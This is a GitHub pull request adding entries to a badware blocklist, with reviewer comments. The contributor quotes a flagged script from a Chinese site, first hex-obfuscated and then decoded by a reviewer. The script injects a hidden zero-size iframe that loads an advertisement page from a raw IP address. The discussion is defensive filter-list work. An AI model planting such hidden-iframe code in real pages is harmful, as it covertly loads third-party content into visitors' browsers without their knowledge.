### PR TITLE
Update badware.txt

### PR DESCRIPTION
**Pull request by DeepChirp**
`http://jinshanduba.org.cn/`

Disguised as the official website of the software

Screenshot_2021-12-19-23-58-22-362_org mozilla firefox

`http://phpstat.cntcm.com.cn/phpstat/count/abceffgh/abceffgh.js`

From `http://cntcm.com.cn/`. I'm not entirely sure the script is malicious, but Kaspersky tells me it is, and points to the malicious code at
```js
var _$ = ['\x69\x66\x72\x61\x6d\x65', '\x68\x74\x74\x70\x3a\x2f\x2f\x31\x32\x33\x2e\x35\x39\x2e\x38\x34\x2e\x31\x36\x31\x3a\x38\x31\x2f\x61\x64\x2e\x68\x74\x6d\x6c'];
var a = document.createElement(_$[0]);a.src = _$[1];a.width = 0x0;a.height = 0x0;document.body.appendChild(a);
```

@iam-py-test So, could you please help to check if there is something wrong with this script? Thanks!

### CODE REVIEW

**Comment by iam-py-test** [comment]
I’ll look into this later today
Thanks

**Comment by iam-py-test** [comment]
Definitionally obfuscated and looks like a fingerprinter. 
Weirdly the website didn't want to load when I VPNed to China but worked when I VPNed to the US
I scanned the file with VT and it was detected by several engines - https://www.virustotal.com/gui/file/c54e8e68b6829e1ee5e09c0f5f6e674e62b2804e22113cd4c2ecf69f7a321f4a?nocache=1
I lack the skills to tell what this script does - and I can not seem to reproduce the conditions where it appeared. I will share it with more experience people and maybe one of them can find out

**Comment by shenzhiming88** [comment]
@iam-py-test Thank you for your survey.
In any case, I don't think this script is a good one - after all, the page works fine without it. So I think this PR can be merged safely.

**Comment by iam-py-test** [comment]
Does the request for the script include paramters? If not, `||phpstat.cntcm.com.cn/phpstat/count/abceffgh/abceffgh.js^$script` or `phpstat.cntcm.com.cn/phpstat/count/abceffgh/abceffgh.js^$all` might have fewer false positives.

**Comment by iam-py-test** [comment]
Thanks

**Comment by shenzhiming88** [comment]
> Does the request for the script include paramters? If not, `||phpstat.cntcm.com.cn/phpstat/count/abceffgh/abceffgh.js^$script` or `phpstat.cntcm.com.cn/phpstat/count/abceffgh/abceffgh.js^$all` might have fewer false positives.

OK, it has been revised. Thanks for your help!
Also, based on the name, I think `phpstat.cntcm.com.cn` is most likely a tracking domain.

**Comment by iam-py-test** [comment]
Still, if it's a tracking script, why so many detentions??

**Comment by shenzhiming88** [comment]
> Still, if it's a tracking script, why so many detentions??

Malicious code added to the tracking script? I guess.

**Comment by krystian3w** [comment]
Kaspersky alarm is about ad iframe:

```js
var _$ = ['iframe', 'http://123.59.84.161:81/ad.html'];
var a = document.createElement(_$[0]);
a.src = _$[1];
a.width = 0x0;
a.height = 0x0;
document.body.appendChild(a);
```

**Comment by iam-py-test** [comment]
IP seems dead anyway

**Pull request merged**
